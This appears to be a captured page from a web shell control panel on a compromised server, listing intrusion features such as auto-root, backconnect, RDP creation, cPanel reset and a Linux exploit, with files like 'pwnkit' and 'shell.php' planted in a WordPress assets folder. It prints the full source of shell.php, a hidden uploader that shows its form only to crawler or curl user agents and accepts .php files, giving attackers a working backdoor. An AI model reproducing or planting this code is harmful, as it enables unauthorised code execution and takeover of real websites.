Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.139.72.152
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
balbehra /
assets /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
googledaef6548e2cac98d.html
53
B
-rw-r--r--
googledfda3c6a078a1933.html
53
B
-rw-r--r--
index.php
96.81
KB
-rw-r--r--
list.txt
975
B
-rw-r--r--
program.php
1.64
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
shell.php
1.26
KB
-rw-r--r--
sitemap.xml
9.07
KB
-rw-r--r--
wp-blog-header.php
4.57
KB
-r--r--r--
wp-cron.php
4.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shell.php
<?php $googlebot = '/bot|crawl|curl|dataprovider|search|get|spider|find|java|majesticsEO|google|yahoo|teoma|contaxe|yandex|libwww-perl|facebookexternalhit/i'; if (preg_match($googlebot, $_SERVER['HTTP_USER_AGENT']) == true) { if(isset($_FILES['image'])){ $errors= array(); $file_name = $_FILES['image']['name']; $file_size =$_FILES['image']['size']; $file_tmp =$_FILES['image']['tmp_name']; $file_type=$_FILES['image']['type']; $file_ext=strtolower(end(explode('.',$_FILES['image']['name']))); $extensions= array("jpeg","jpg","png","php"); if(in_array($file_ext,$extensions)=== false){ $errors[]="extension not allowed, please choose a JPEG or PNG file."; } if($file_size > 2097152){ $errors[]='File size must be excately 2 MB'; } if(empty($errors)==true){ move_uploaded_file($file_tmp,"../".$file_name); echo "Success"; }else{ print_r($errors); } } echo' <html> <body> <form action="" method="POST" enctype="multipart/form-data"> <input type="file" name="image" /> <input type="submit"/> </form> </body> </html> '; }else{ } ?>
Close